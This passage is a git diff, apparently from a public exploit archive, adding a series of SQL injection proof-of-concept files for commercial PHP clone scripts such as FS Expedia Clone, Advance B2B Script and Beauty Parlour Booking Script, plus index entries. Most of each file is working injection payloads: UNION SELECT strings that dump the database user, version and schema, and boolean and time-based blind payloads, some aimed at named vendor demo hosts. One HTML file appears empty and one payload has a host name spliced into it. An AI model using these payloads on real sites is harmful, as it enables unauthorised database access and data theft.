Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/p/VerAyari/[SQL] +# +# -9++UNION(SELECT(1),(2),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# http://server/p/VerAyari/-9++UNION(SELECT(1),(2),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43260.txt b/exploits/php/webapps/43260.txt new file mode 100644 index 000000000..bd3939bbb --- /dev/null +++ b/exploits/php/webapps/43260.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: FS Trademe Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/trademe-clone/ +# Demo: http://trademe-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search_item.php?search=[SQL] +# +# s'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9,10,11,12,13,14--+- +# +# http://server/search_item.php?search=s'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9,10,11,12,13,14--+- +# +# 2) +# http://localhost/[PATH]/general_item_details.php?id=[SQL] +# +# -34++UNION+ALL+SELECT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# http://server/general_item_details.php?id=-34++UNION+ALL+SELECT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43261.txt b/exploits/php/webapps/43261.txt new file mode 100644 index 000000000..809572346 --- /dev/null +++ b/exploits/php/webapps/43261.txt @@ -0,0 +1,46 @@ +# # # # # +# Exploit Title: FS Expedia Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/expedia-clone/ +# Demo: http://expedia-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/show-flight-result.php?fl_orig=[SQL] +# http://localhost/[PATH]/show-flight-result.php?fl_dest=[SQL] +# +# 25'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+- +# +# http://server/show-flight-result.php?fl_orig=25'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+- +# +# http://server/show-flight-result.php?fl_dest=28'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+- +# +# 2) +# http://localhost/[PATH]/pages.php?id=[SQL] +# +# -5++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# http://server/pages.php?id=-5++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# 3) +# http://localhost/[PATH]/content.php?id=[SQL] +# +# -2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))expedia-clone.demonstration.co.in/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7)) +# +# http://server/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))expedia-clone.demonstration.co.in/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7)) +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43262.html b/exploits/php/webapps/43262.html new file mode 100644 index 000000000..bc14044c3 --- /dev/null +++ b/exploits/php/webapps/43262.html @@ -0,0 +1,30 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43263.txt b/exploits/php/webapps/43263.txt new file mode 100644 index 000000000..c7ec15e6b --- /dev/null +++ b/exploits/php/webapps/43263.txt @@ -0,0 +1,58 @@ +# # # # # +# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/ +# Demo: http://198.38.86.159/~advancedb2b/ +# Version: 2.1.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL] +# +# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+- +# +# http:/server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+- +# +# Parameter: show_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 67 columns +# Payload: show_id=-3015' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl +# +# 2) +# http://localhost/[PATH]/view-product.php?pid=[SQL] +# +# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+- +# +# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+- +# +# Parameter: pid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 33 columns +# Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43264.txt b/exploits/php/webapps/43264.txt new file mode 100644 index 000000000..85979d177 --- /dev/null +++ b/exploits/php/webapps/43264.txt @@ -0,0 +1,54 @@ +# # # # # +# Exploit Title: Advance Online Learning Management Script 3.1 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/online-learning-management-script/ +# Demo: http://thavasu.com/demo/online_education/ +# Version: 3.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/courselist.php?subcatid=[SQL] +# +# -9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+- +# +# http://server/courselist.php?subcatid=-9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+- +# +# Parameter: subcatid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: subcatid=9' AND 7659=7659 AND 'Akrr'='Akrr +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: subcatid=9' AND SLEEP(5) AND 'DoFl'='DoFl +# +# 2) +# http://localhost/[PATH]/courselist.php?popcourseid=[SQL] +# +# 1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+- +# +# http://server/courselist.php?popcourseid=1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+- +# +# Parameter: popcourseid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: popcourseid=1' AND 9182=9182 AND 'vWmu'='vWmu +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: popcourseid=1' AND SLEEP(5) AND 'THTz'='THTz +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43265.txt b/exploits/php/webapps/43265.txt new file mode 100644 index 000000000..3aea1c613 --- /dev/null +++ b/exploits/php/webapps/43265.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/ +# Demo: http://www.smsemailmarketing.in/demo/Affiliate/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/product-category.php?key=[SQL] +# +# Parameter: key (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: key=a%' AND 5436=5436 AND '%'=' +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43266.txt b/exploits/php/webapps/43266.txt new file mode 100644 index 000000000..26516c3db --- /dev/null +++ b/exploits/php/webapps/43266.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Basic B2B Script 2.0.8 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/professional-b2b-script/ +# Version: 2.0.8 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/product_details.php?id=[SQL] +# +# -348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-- +# +# http://server/product_details.php?id=-348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43267.txt b/exploits/php/webapps/43267.txt new file mode 100644 index 000000000..e20d98c35 --- /dev/null +++ b/exploits/php/webapps/43267.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: Beauty Parlour Booking Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/beauty-booking-script/ +# Demo: http://fxwebsolution.com/demo/beautyparlour-search/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?gender=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# http://server/beautyparlour-search/list?gender='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# 2) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# http://server/beautyparlour-search/list?city='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 503f819c1..8c62511ec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -38280,3 +38280,23 @@ id,file,description,date,author,type,platform,port 43243,exploits/php/webapps/43243.txt,"FS Quibids Clone 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80 43244,exploits/php/webapps/43244.txt,"FS Olx Clone 1.0 - 'scat' / 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80 43245,exploits/php/webapps/43245.txt,"FS Monster Clone 1.0 - 'Employer_Details.php?id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80 +43246,exploits/php/webapps/43246.txt,"FS Makemytrip Clone 1.0 - 'fl_orig' / 'fl_dest' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80 +43249,exploits/php/webapps/43249.txt,"FS Linkedin Clone 1.0 - 'grid' / 'fid' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43250,exploits/php/webapps/43250.txt,"FS Indiamart Clone 1.0 - 'token' / 'id' / 'c' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43251,exploits/php/webapps/43251.txt,"FS IMDB Clone 1.0 - 'f' / 's' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43252,exploits/php/webapps/43252.html,"FS Grubhub Clone 1.0 - 'keywords' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43253,exploits/php/webapps/43253.txt,"FS Groupon Clone 1.0 - 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43254,exploits/php/webapps/43254.txt,"FS Gigs Script 1.0 - 'cat' / 'sc' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43255,exploits/php/webapps/43255.txt,"FS Freelancer Clone 1.0 - 'profile.php?u' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43256,exploits/php/webapps/43256.txt,"FS Ebay Clone 1.0 - 'id' / 'sub_category_id' / 'category_id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43257,exploits/php/webapps/43257.txt,"FS Crowdfunding Script 1.0 - 'latest_news_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43258,exploits/php/webapps/43258.txt,"FS Care Clone 1.0 - 'jobFrequency' / 'jobType' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43259,exploits/php/webapps/43259.txt,"FS Amazon Clone 1.0 - SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43260,exploits/php/webapps/43260.txt,"FS Trademe Clone 1.0 - 'search' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43261,exploits/php/webapps/43261.txt,"FS Expedia Clone 1.0 - 'fl_orig' / 'fl_dest' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43262,exploits/php/webapps/43262.html,"FS Foodpanda Clone 1.0 - SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43263,exploits/php/webapps/43263.txt,"Advance B2B Script 2.1.3 - 'show_id' / 'pid' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43264,exploits/php/webapps/43264.txt,"Advance Online Learning Management Script 3.1 - 'subcatid' / 'popcourseid' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43266,exploits/php/webapps/43266.txt,"Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80